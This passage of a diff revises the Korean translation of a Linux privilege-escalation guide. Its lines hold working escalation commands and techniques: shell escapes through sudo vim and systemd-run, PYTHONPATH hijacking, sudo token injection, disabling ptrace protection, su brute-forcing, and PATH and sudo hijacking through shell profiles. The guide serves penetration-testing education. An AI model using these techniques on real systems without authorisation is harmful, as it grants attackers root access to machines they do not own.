๊ถŒํ•œ์„ ์ž์„ธํžˆ ์„ค๋ช…ํ•ฉ๋‹ˆ๋‹ค. +`/etc/dbus-1/system.d/wpa_supplicant.conf`์— ์žˆ๋Š” ์ •์ฑ…์˜ ์˜ˆ๋Š” root ์‚ฌ์šฉ์ž๊ฐ€ `fi.w1.wpa_supplicant1`์—์„œ ๋ฉ”์‹œ์ง€๋ฅผ ์†Œ์œ ํ•˜๊ณ , ์ „์†กํ•˜๊ณ , ์ˆ˜์‹ ํ•  ์ˆ˜ ์žˆ๋Š” ๊ถŒํ•œ์„ ์ž์„ธํžˆ ์„ค๋ช…ํ•ฉ๋‹ˆ๋‹ค. ์ง€์ •๋œ ์‚ฌ์šฉ์ž๋‚˜ ๊ทธ๋ฃน์ด ์—†๋Š” ์ •์ฑ…์€ ๋ณดํŽธ์ ์œผ๋กœ ์ ์šฉ๋˜๋ฉฐ, "๊ธฐ๋ณธ" ์ปจํ…์ŠคํŠธ ์ •์ฑ…์€ ๋‹ค๋ฅธ ํŠน์ • ์ •์ฑ…์— ์˜ํ•ด ๋‹ค๋ฃจ์–ด์ง€์ง€ ์•Š๋Š” ๋ชจ๋“  ๊ฒฝ์šฐ์— ์ ์šฉ๋ฉ๋‹ˆ๋‹ค. ```xml @@ -629,7 +629,7 @@ timeout 1 tcpdump ### Generic Enumeration -๋‹น์‹ ์ด **๋ˆ„๊ตฌ**์ธ์ง€, ์–ด๋–ค **๊ถŒํ•œ**์ด ์žˆ๋Š”์ง€, ์‹œ์Šคํ…œ์— ์–ด๋–ค **์‚ฌ์šฉ์ž**๊ฐ€ ์žˆ๋Š”์ง€, ์–ด๋–ค ์‚ฌ์šฉ์ž๊ฐ€ **๋กœ๊ทธ์ธ**ํ•  ์ˆ˜ ์žˆ๋Š”์ง€, ๊ทธ๋ฆฌ๊ณ  ์–ด๋–ค ์‚ฌ์šฉ์ž๊ฐ€ **๋ฃจํŠธ ๊ถŒํ•œ**์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š”์ง€ ํ™•์ธํ•˜์‹ญ์‹œ์˜ค: +Check **who** you are, which **privileges** do you have, which **users** are in the systems, which ones can **login** and which ones have **root privileges:** ```bash #Info about me id || (whoami && groups) 2>/dev/null @@ -654,7 +654,7 @@ gpg --list-keys 2>/dev/null ### Big UID ์ผ๋ถ€ Linux ๋ฒ„์ „์€ **UID > INT_MAX**๋ฅผ ๊ฐ€์ง„ ์‚ฌ์šฉ์ž๊ฐ€ ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ฌ ์ˆ˜ ์žˆ๋Š” ๋ฒ„๊ทธ์˜ ์˜ํ–ฅ์„ ๋ฐ›์•˜์Šต๋‹ˆ๋‹ค. ๋” ๋งŽ์€ ์ •๋ณด: [here](https://gitlab.freedesktop.org/polkit/polkit/issues/74), [here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) ๋ฐ [here](https://twitter.com/paragonsec/status/1071152249529884674).\ -**๋‹ค์Œ๊ณผ ๊ฐ™์ด ์•…์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**: **`systemd-run -t /bin/bash`** +**์ด์šฉํ•˜๊ธฐ**: **`systemd-run -t /bin/bash`** ### Groups @@ -683,22 +683,22 @@ grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/logi ``` ### ์•Œ๋ ค์ง„ ๋น„๋ฐ€๋ฒˆํ˜ธ -ํ™˜๊ฒฝ์˜ **์–ด๋–ค ๋น„๋ฐ€๋ฒˆํ˜ธ๋ผ๋„ ์•Œ๊ณ  ์žˆ๋‹ค๋ฉด** ํ•ด๋‹น ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ **๊ฐ ์‚ฌ์šฉ์ž๋กœ ๋กœ๊ทธ์ธํ•ด ๋ณด์‹ญ์‹œ์˜ค**. +ํ™˜๊ฒฝ์˜ **๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์•Œ๊ณ  ์žˆ๋‹ค๋ฉด** ๊ฐ ์‚ฌ์šฉ์ž๋กœ **๋กœ๊ทธ์ธํ•ด ๋ณด์„ธ์š”**. ### Su Brute -๋งŽ์€ ์†Œ์Œ์„ ๋ฐœ์ƒ์‹œํ‚ค๋Š” ๊ฒƒ์— ์‹ ๊ฒฝ ์“ฐ์ง€ ์•Š๊ณ  `su` ๋ฐ `timeout` ๋ฐ”์ด๋„ˆ๋ฆฌ๊ฐ€ ์ปดํ“จํ„ฐ์— ์กด์žฌํ•œ๋‹ค๋ฉด, [su-bruteforce](https://github.com/carlospolop/su-bruteforce)๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์‚ฌ์šฉ์ž๋ฅผ ๋ฌด์ž‘์œ„๋กœ ๊ณต๊ฒฉํ•ด ๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.\ -[**Linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)๋„ `-a` ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์‚ฌ์šฉ์ž๋ฅผ ๋ฌด์ž‘์œ„๋กœ ๊ณต๊ฒฉํ•ฉ๋‹ˆ๋‹ค. +์†Œ์Œ์ด ๋งŽ์ด ๋ฐœ์ƒํ•˜๋Š” ๊ฒƒ์„ ์‹ ๊ฒฝ ์“ฐ์ง€ ์•Š๊ณ  `su`์™€ `timeout` ๋ฐ”์ด๋„ˆ๋ฆฌ๊ฐ€ ์ปดํ“จํ„ฐ์— ์กด์žฌํ•œ๋‹ค๋ฉด, [su-bruteforce](https://github.com/carlospolop/su-bruteforce)๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์‚ฌ์šฉ์ž๋ฅผ ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.\ +[**Linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)๋„ `-a` ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์‚ฌ์šฉ์ž ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ์„ ์‹œ๋„ํ•ฉ๋‹ˆ๋‹ค. 
## ์“ฐ๊ธฐ ๊ฐ€๋Šฅํ•œ PATH ๋‚จ์šฉ ### $PATH -$PATH์˜ **์–ด๋–ค ํด๋” ์•ˆ์— ์“ธ ์ˆ˜ ์žˆ๋Š” ๊ถŒํ•œ์ด ์žˆ๋‹ค๋ฉด** ์“ฐ๊ธฐ ๊ฐ€๋Šฅํ•œ ํด๋” ์•ˆ์— **๋ฐฑ๋„์–ด๋ฅผ ์ƒ์„ฑํ•˜์—ฌ** ๋‹ค๋ฅธ ์‚ฌ์šฉ์ž(์ด์ƒ์ ์œผ๋กœ๋Š” root)์— ์˜ํ•ด ์‹คํ–‰๋  ๋ช…๋ น์˜ ์ด๋ฆ„์œผ๋กœ ์„ค์ •ํ•จ์œผ๋กœ์จ ๊ถŒํ•œ ์ƒ์Šน์„ ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด ๋ช…๋ น์€ $PATH์—์„œ ๊ท€ํ•˜์˜ ์“ฐ๊ธฐ ๊ฐ€๋Šฅํ•œ ํด๋”๋ณด๋‹ค **์•ž์„œ ์œ„์น˜ํ•œ ํด๋”์—์„œ ๋กœ๋“œ๋˜์ง€ ์•Š์•„์•ผ** ํ•ฉ๋‹ˆ๋‹ค. +$PATH์˜ **์–ด๋–ค ํด๋”์— ์“ธ ์ˆ˜ ์žˆ๋‹ค๋ฉด** ์“ฐ๊ธฐ ๊ฐ€๋Šฅํ•œ ํด๋” ์•ˆ์— **๋ฐฑ๋„์–ด๋ฅผ ์ƒ์„ฑํ•˜์—ฌ** ๋‹ค๋ฅธ ์‚ฌ์šฉ์ž(์ด์ƒ์ ์œผ๋กœ๋Š” root)์— ์˜ํ•ด ์‹คํ–‰๋  ๋ช…๋ น์˜ ์ด๋ฆ„์œผ๋กœ ์„ค์ •ํ•จ์œผ๋กœ์จ ๊ถŒํ•œ ์ƒ์Šน์„ ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด ๋ช…๋ น์€ $PATH์—์„œ ์“ฐ๊ธฐ ๊ฐ€๋Šฅํ•œ ํด๋”๋ณด๋‹ค **์ด์ „์˜ ํด๋”์—์„œ ๋กœ๋“œ๋˜์ง€ ์•Š์•„์•ผ** ํ•ฉ๋‹ˆ๋‹ค. ### SUDO ๋ฐ SUID -sudo๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ผ๋ถ€ ๋ช…๋ น์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๋„๋ก ํ—ˆ์šฉ๋˜์—ˆ๊ฑฐ๋‚˜ suid ๋น„ํŠธ๊ฐ€ ์„ค์ •๋˜์–ด ์žˆ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋‹ค์Œ์„ ์‚ฌ์šฉํ•˜์—ฌ ํ™•์ธํ•˜์‹ญ์‹œ์˜ค: +sudo๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ผ๋ถ€ ๋ช…๋ น์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๋„๋ก ํ—ˆ์šฉ๋˜๊ฑฐ๋‚˜ suid ๋น„ํŠธ๊ฐ€ ์„ค์ •๋˜์–ด ์žˆ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋‹ค์Œ์„ ์‚ฌ์šฉํ•˜์—ฌ ํ™•์ธํ•˜์„ธ์š”: ```bash sudo -l #Check commands you can execute with sudo find / -perm -4000 2>/dev/null #Find all SUID binaries @@ -726,13 +726,13 @@ sudo vim -c '!sh' ``` ### SETENV -์ด ์ง€์‹œ์–ด๋Š” ์‚ฌ์šฉ์ž๊ฐ€ ๋ฌด์–ธ๊ฐ€๋ฅผ ์‹คํ–‰ํ•˜๋Š” ๋™์•ˆ **ํ™˜๊ฒฝ ๋ณ€์ˆ˜๋ฅผ ์„ค์ •**ํ•  ์ˆ˜ ์žˆ๋„๋ก ํ—ˆ์šฉํ•ฉ๋‹ˆ๋‹ค: +์ด ์ง€์‹œ์–ด๋Š” ์‚ฌ์šฉ์ž๊ฐ€ ๋ฌด์–ธ๊ฐ€๋ฅผ ์‹คํ–‰ํ•˜๋Š” ๋™์•ˆ **ํ™˜๊ฒฝ ๋ณ€์ˆ˜๋ฅผ ์„ค์ •**ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ค๋‹ˆ๋‹ค: ```bash $ sudo -l User waldo may run the following commands on admirer: (ALL) SETENV: /opt/scripts/admin_tasks.sh ``` -์ด ์˜ˆ์ œ๋Š” **HTB ๋จธ์‹  Admirer**๋ฅผ ๊ธฐ๋ฐ˜์œผ๋กœ ํ•˜๋ฉฐ, ์Šคํฌ๋ฆฝํŠธ๋ฅผ ๋ฃจํŠธ๋กœ ์‹คํ–‰ํ•˜๋Š” ๋™์•ˆ ์ž„์˜์˜ ํŒŒ์ด์ฌ ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ๋ฅผ ๋กœ๋“œํ•˜๊ธฐ ์œ„ํ•ด **PYTHONPATH ํ•˜์ด์žฌํ‚น**์— **์ทจ์•ฝ**ํ–ˆ์Šต๋‹ˆ๋‹ค: +์ด ์˜ˆ์ œ๋Š” **HTB ๋จธ์‹  Admirer**๋ฅผ ๊ธฐ๋ฐ˜์œผ๋กœ ํ•˜๋ฉฐ, ์Šคํฌ๋ฆฝํŠธ๋ฅผ ๋ฃจํŠธ๋กœ ์‹คํ–‰ํ•  ๋•Œ ์ž„์˜์˜ ํŒŒ์ด์ฌ ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ๋ฅผ ๋กœ๋“œํ•˜๊ธฐ ์œ„ํ•ด **PYTHONPATH ํ•˜์ด์žฌํ‚น**์— **์ทจ์•ฝ**ํ–ˆ์Šต๋‹ˆ๋‹ค: ```bash sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh ``` @@ -888,7 +888,7 @@ system("/bin/bash -p"); ```shell-session ./suid_bin: symbol lookup error: ./suid_bin: undefined symbol: a_function_name ``` -๊ทธ๊ฒƒ์€ ๋‹น์‹ ์ด ์ƒ์„ฑํ•œ ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ์— `a_function_name`์ด๋ผ๋Š” ํ•จ์ˆ˜๊ฐ€ ํ•„์š”ํ•˜๋‹ค๋Š” ๊ฒƒ์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค. +๊ทธ๊ฒƒ์€ ๋‹น์‹ ์ด ์ƒ์„ฑํ•œ ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ์— `a_function_name`์ด๋ผ๋Š” ํ•จ์ˆ˜๊ฐ€ ์žˆ์–ด์•ผ ํ•จ์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค. ### GTFOBins @@ -919,16 +919,16 @@ https://gtfoargs.github.io/ ๊ถŒํ•œ ์ƒ์Šน์„ ์œ„ํ•œ ์š”๊ตฌ ์‚ฌํ•ญ: -- ์ด๋ฏธ "_sampleuser_" ์‚ฌ์šฉ์ž๋กœ ์…ธ์„ ๊ฐ€์ง€๊ณ  ์žˆ์Œ -- "_sampleuser_"๊ฐ€ **์ตœ๊ทผ 15๋ถ„** ์ด๋‚ด์— **`sudo`**๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋ฌด์–ธ๊ฐ€๋ฅผ ์‹คํ–‰ํ–ˆ์Œ (๊ธฐ๋ณธ์ ์œผ๋กœ ์ด๋Š” ๋น„๋ฐ€๋ฒˆํ˜ธ ์—†์ด `sudo`๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ฃผ๋Š” sudo ํ† ํฐ์˜ ์ง€์† ์‹œ๊ฐ„์ž…๋‹ˆ๋‹ค) -- `cat /proc/sys/kernel/yama/ptrace_scope`๋Š” 0์ž„ -- `gdb`์— ์ ‘๊ทผ ๊ฐ€๋Šฅ (์—…๋กœ๋“œํ•  ์ˆ˜ ์žˆ์–ด์•ผ ํ•จ) +- ์ด๋ฏธ "_sampleuser_" ์‚ฌ์šฉ์ž๋กœ ์…ธ์„ ๊ฐ€์ง€๊ณ  ์žˆ์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. +- "_sampleuser_"๊ฐ€ **์ตœ๊ทผ 15๋ถ„ ์ด๋‚ด์— `sudo`**๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋ฌด์–ธ๊ฐ€๋ฅผ ์‹คํ–‰ํ–ˆ์Šต๋‹ˆ๋‹ค (๊ธฐ๋ณธ์ ์œผ๋กœ ์ด๋Š” ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์ž…๋ ฅํ•˜์ง€ ์•Š๊ณ  `sudo`๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ฃผ๋Š” sudo ํ† ํฐ์˜ ์ง€์† ์‹œ๊ฐ„์ž…๋‹ˆ๋‹ค). +- `cat /proc/sys/kernel/yama/ptrace_scope`๋Š” 0์ž…๋‹ˆ๋‹ค. 
+- `gdb`์— ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค (์—…๋กœ๋“œํ•  ์ˆ˜ ์žˆ์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค). -(์ผ์‹œ์ ์œผ๋กœ `ptrace_scope`๋ฅผ ํ™œ์„ฑํ™”ํ•˜๋ ค๋ฉด `echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope`๋ฅผ ์‚ฌ์šฉํ•˜๊ฑฐ๋‚˜ `/etc/sysctl.d/10-ptrace.conf`๋ฅผ ์˜๊ตฌ์ ์œผ๋กœ ์ˆ˜์ •ํ•˜๊ณ  `kernel.yama.ptrace_scope = 0`์œผ๋กœ ์„ค์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค) +(์ผ์‹œ์ ์œผ๋กœ `ptrace_scope`๋ฅผ ํ™œ์„ฑํ™”ํ•˜๋ ค๋ฉด `echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope`๋ฅผ ์‚ฌ์šฉํ•˜๊ฑฐ๋‚˜ `/etc/sysctl.d/10-ptrace.conf`๋ฅผ ์˜๊ตฌ์ ์œผ๋กœ ์ˆ˜์ •ํ•˜๊ณ  `kernel.yama.ptrace_scope = 0`์œผ๋กœ ์„ค์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.) ์ด ๋ชจ๋“  ์š”๊ตฌ ์‚ฌํ•ญ์ด ์ถฉ์กฑ๋˜๋ฉด, **๋‹ค์Œ ๋งํฌ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:** [**https://github.com/nongiach/sudo_inject**](https://github.com/nongiach/sudo_inject) -- **์ฒซ ๋ฒˆ์งธ ์ต์Šคํ”Œ๋กœ์ž‡**(`exploit.sh`)์€ _/tmp_์— `activate_sudo_token`์ด๋ผ๋Š” ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฅผ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค. ์ด๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ **์„ธ์…˜์—์„œ sudo ํ† ํฐ์„ ํ™œ์„ฑํ™”ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค** (์ž๋™์œผ๋กœ ๋ฃจํŠธ ์…ธ์„ ์–ป์ง€ ์•Š์œผ๋ฉฐ, `sudo su`๋ฅผ ์‹คํ–‰ํ•ด์•ผ ํ•จ): +- **์ฒซ ๋ฒˆ์งธ ์ต์Šคํ”Œ๋กœ์ž‡**(`exploit.sh`)์€ _/tmp_์— `activate_sudo_token`์ด๋ผ๋Š” ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฅผ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค. ์ด๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ **์„ธ์…˜์—์„œ sudo ํ† ํฐ์„ ํ™œ์„ฑํ™”ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค** (์ž๋™์œผ๋กœ ๋ฃจํŠธ ์…ธ์„ ์–ป์ง€ ์•Š์œผ๋ฉฐ, `sudo su`๋ฅผ ์‹คํ–‰ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค): ```bash bash exploit.sh /tmp/activate_sudo_token @@ -946,8 +946,8 @@ sudo su ``` ### /var/run/sudo/ts/\ -ํ•ด๋‹น ํด๋” ๋˜๋Š” ํด๋” ๋‚ด์— ์ƒ์„ฑ๋œ ํŒŒ์ผ์— **์“ฐ๊ธฐ ๊ถŒํ•œ**์ด ์žˆ๋Š” ๊ฒฝ์šฐ, ์ด์ง„ ํŒŒ์ผ [**write_sudo_token**](https://github.com/nongiach/sudo_inject/tree/master/extra_tools)์„ ์‚ฌ์šฉํ•˜์—ฌ **์‚ฌ์šฉ์ž ๋ฐ PID์— ๋Œ€ํ•œ sudo ํ† ํฐ์„ ์ƒ์„ฑ**ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.\ -์˜ˆ๋ฅผ ๋“ค์–ด, _/var/run/sudo/ts/sampleuser_ ํŒŒ์ผ์„ ๋ฎ์–ด์“ธ ์ˆ˜ ์žˆ๊ณ , PID 1234๋กœ ํ•ด๋‹น ์‚ฌ์šฉ์ž๋กœ ์‰˜์„ ๊ฐ€์ง€๊ณ  ์žˆ๋‹ค๋ฉด, ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์•Œ ํ•„์š” ์—†์ด **sudo ๊ถŒํ•œ์„ ์–ป์„ ์ˆ˜** ์žˆ์Šต๋‹ˆ๋‹ค. +ํ•ด๋‹น ํด๋” ๋˜๋Š” ํด๋” ๋‚ด์— ์ƒ์„ฑ๋œ ํŒŒ์ผ ์ค‘ ํ•˜๋‚˜์— **์“ฐ๊ธฐ ๊ถŒํ•œ**์ด ์žˆ๋Š” ๊ฒฝ์šฐ, ๋ฐ”์ด๋„ˆ๋ฆฌ [**write_sudo_token**](https://github.com/nongiach/sudo_inject/tree/master/extra_tools)๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ **์‚ฌ์šฉ์ž ๋ฐ PID์— ๋Œ€ํ•œ sudo ํ† ํฐ์„ ์ƒ์„ฑ**ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.\ +์˜ˆ๋ฅผ ๋“ค์–ด, _/var/run/sudo/ts/sampleuser_ ํŒŒ์ผ์„ ๋ฎ์–ด์“ธ ์ˆ˜ ์žˆ๊ณ , PID 1234๋กœ ํ•ด๋‹น ์‚ฌ์šฉ์ž๋กœ ์‰˜์„ ๊ฐ€์ง€๊ณ  ์žˆ๋‹ค๋ฉด, ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์•Œ ํ•„์š” ์—†์ด ๋‹ค์Œ์„ ์ˆ˜ํ–‰ํ•˜์—ฌ **sudo ๊ถŒํ•œ์„ ์–ป์„ ์ˆ˜** ์žˆ์Šต๋‹ˆ๋‹ค: ```bash ./write_sudo_token 1234 > /var/run/sudo/ts/sampleuser ``` @@ -979,9 +979,9 @@ permit nopass demo as root cmd vim ``` ### Sudo Hijacking -๋งŒ์•ฝ **์‚ฌ์šฉ์ž๊ฐ€ ์ผ๋ฐ˜์ ์œผ๋กœ ๋จธ์‹ ์— ์—ฐ๊ฒฐํ•˜๊ณ  `sudo`๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ค๋Š”** ๊ฒƒ์„ ์•Œ๊ณ  ์žˆ๊ณ , ๊ทธ ์‚ฌ์šฉ์ž ์ปจํ…์ŠคํŠธ ๋‚ด์—์„œ ์‰˜์„ ์–ป์—ˆ๋‹ค๋ฉด, **์ƒˆ๋กœ์šด sudo ์‹คํ–‰ ํŒŒ์ผ์„ ์ƒ์„ฑ**ํ•˜์—ฌ ๋ฃจํŠธ๋กœ์„œ ๋‹น์‹ ์˜ ์ฝ”๋“œ๋ฅผ ์‹คํ–‰ํ•œ ๋‹ค์Œ ์‚ฌ์šฉ์ž์˜ ๋ช…๋ น์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๊ทธ๋Ÿฐ ๋‹ค์Œ, **์‚ฌ์šฉ์ž ์ปจํ…์ŠคํŠธ์˜ $PATH๋ฅผ ์ˆ˜์ •**ํ•˜์—ฌ (์˜ˆ๋ฅผ ๋“ค์–ด .bash_profile์— ์ƒˆ๋กœ์šด ๊ฒฝ๋กœ๋ฅผ ์ถ”๊ฐ€ํ•˜์—ฌ) ์‚ฌ์šฉ์ž๊ฐ€ sudo๋ฅผ ์‹คํ–‰ํ•  ๋•Œ ๋‹น์‹ ์˜ sudo ์‹คํ–‰ ํŒŒ์ผ์ด ์‹คํ–‰๋˜๋„๋ก ํ•ฉ๋‹ˆ๋‹ค. 
+๋งŒ์•ฝ **์‚ฌ์šฉ์ž๊ฐ€ ์ผ๋ฐ˜์ ์œผ๋กœ ๋จธ์‹ ์— ์—ฐ๊ฒฐํ•˜๊ณ  `sudo`๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ค๋Š”** ๊ฒƒ์„ ์•Œ๊ณ  ์žˆ๊ณ , ๊ทธ ์‚ฌ์šฉ์ž ์ปจํ…์ŠคํŠธ ๋‚ด์—์„œ ์‰˜์„ ์–ป์—ˆ๋‹ค๋ฉด, **์ƒˆ๋กœ์šด sudo ์‹คํ–‰ ํŒŒ์ผ์„ ์ƒ์„ฑ**ํ•˜์—ฌ ๋ฃจํŠธ๋กœ์„œ ๋‹น์‹ ์˜ ์ฝ”๋“œ๋ฅผ ์‹คํ–‰ํ•˜๊ณ  ๊ทธ ๋‹ค์Œ ์‚ฌ์šฉ์ž์˜ ๋ช…๋ น์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๊ทธ๋Ÿฐ ๋‹ค์Œ, **์‚ฌ์šฉ์ž ์ปจํ…์ŠคํŠธ์˜ $PATH๋ฅผ ์ˆ˜์ •**ํ•˜์—ฌ (์˜ˆ: .bash_profile์— ์ƒˆ๋กœ์šด ๊ฒฝ๋กœ ์ถ”๊ฐ€) ์‚ฌ์šฉ์ž๊ฐ€ sudo๋ฅผ ์‹คํ–‰ํ•  ๋•Œ ๋‹น์‹ ์˜ sudo ์‹คํ–‰ ํŒŒ์ผ์ด ์‹คํ–‰๋˜๋„๋ก ํ•ฉ๋‹ˆ๋‹ค. -์‚ฌ์šฉ์ž๊ฐ€ ๋‹ค๋ฅธ ์‰˜(๋ฐฐ์‹œ๊ฐ€ ์•„๋‹Œ)์„ ์‚ฌ์šฉํ•˜๋Š” ๊ฒฝ์šฐ, ์ƒˆ๋กœ์šด ๊ฒฝ๋กœ๋ฅผ ์ถ”๊ฐ€ํ•˜๊ธฐ ์œ„ํ•ด ๋‹ค๋ฅธ ํŒŒ์ผ์„ ์ˆ˜์ •ํ•ด์•ผ ํ•œ๋‹ค๋Š” ์ ์— ์œ ์˜ํ•˜์„ธ์š”. ์˜ˆ๋ฅผ ๋“ค์–ด[ sudo-piggyback](https://github.com/APTy/sudo-piggyback)๋Š” `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`๋ฅผ ์ˆ˜์ •ํ•ฉ๋‹ˆ๋‹ค. [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py)์—์„œ ๋˜ ๋‹ค๋ฅธ ์˜ˆ๋ฅผ ์ฐพ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +์‚ฌ์šฉ์ž๊ฐ€ ๋‹ค๋ฅธ ์‰˜(๋ฐฐ์‹œ๊ฐ€ ์•„๋‹Œ)์„ ์‚ฌ์šฉํ•˜๋Š” ๊ฒฝ์šฐ, ์ƒˆ๋กœ์šด ๊ฒฝ๋กœ๋ฅผ ์ถ”๊ฐ€ํ•˜๊ธฐ ์œ„ํ•ด ๋‹ค๋ฅธ ํŒŒ์ผ์„ ์ˆ˜์ •ํ•ด์•ผ ํ•œ๋‹ค๋Š” ์ ์— ์œ ์˜ํ•˜์„ธ์š”. ์˜ˆ๋ฅผ ๋“ค์–ด [sudo-piggyback](https://github.com/APTy/sudo-piggyback)๋Š” `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`๋ฅผ ์ˆ˜์ •ํ•ฉ๋‹ˆ๋‹ค. [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py)์—์„œ ๋˜ ๋‹ค๋ฅธ ์˜ˆ๋ฅผ ์ฐพ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋˜๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์€ ๊ฒƒ์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: ```bash @@ -1006,7 +1006,7 @@ sudo ls ์ด๋Š” `/etc/ld.so.conf.d/*.conf`์˜ ๊ตฌ์„ฑ ํŒŒ์ผ์ด ์ฝํž ๊ฒƒ์ž„์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค. ์ด ๊ตฌ์„ฑ ํŒŒ์ผ์€ **๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ**๊ฐ€ **๊ฒ€์ƒ‰**๋  **๋‹ค๋ฅธ ํด๋”**๋ฅผ ๊ฐ€๋ฆฌํ‚ต๋‹ˆ๋‹ค. ์˜ˆ๋ฅผ ๋“ค์–ด, `/etc/ld.so.conf.d/libc.conf`์˜ ๋‚ด์šฉ์€ `/usr/local/lib`์ž…๋‹ˆ๋‹ค. **์ด๋Š” ์‹œ์Šคํ…œ์ด `/usr/local/lib` ๋‚ด์—์„œ ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ๋ฅผ ๊ฒ€์ƒ‰ํ•  ๊ฒƒ์ž„์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค.** -์–ด๋–ค ์ด์œ ๋กœ๋“  **์‚ฌ์šฉ์ž๊ฐ€ ๋‹ค์Œ ๊ฒฝ๋กœ ์ค‘ ํ•˜๋‚˜์— ์“ฐ๊ธฐ ๊ถŒํ•œ**์ด ์žˆ๋Š” ๊ฒฝ์šฐ: `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, `/etc/ld.so.conf.d/` ๋‚ด์˜ ๋ชจ๋“  ํŒŒ์ผ ๋˜๋Š” `/etc/ld.so.conf.d/*.conf` ๋‚ด์˜ ๊ตฌ์„ฑ ํŒŒ์ผ ๋‚ด์˜ ๋ชจ๋“  ํด๋”, ๊ทธ๋Š” ๊ถŒํ•œ ์ƒ์Šน์„ ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.\ +์–ด๋–ค ์ด์œ ๋กœ๋“  **์‚ฌ์šฉ์ž๊ฐ€ ๋‹ค์Œ ๊ฒฝ๋กœ ์ค‘ 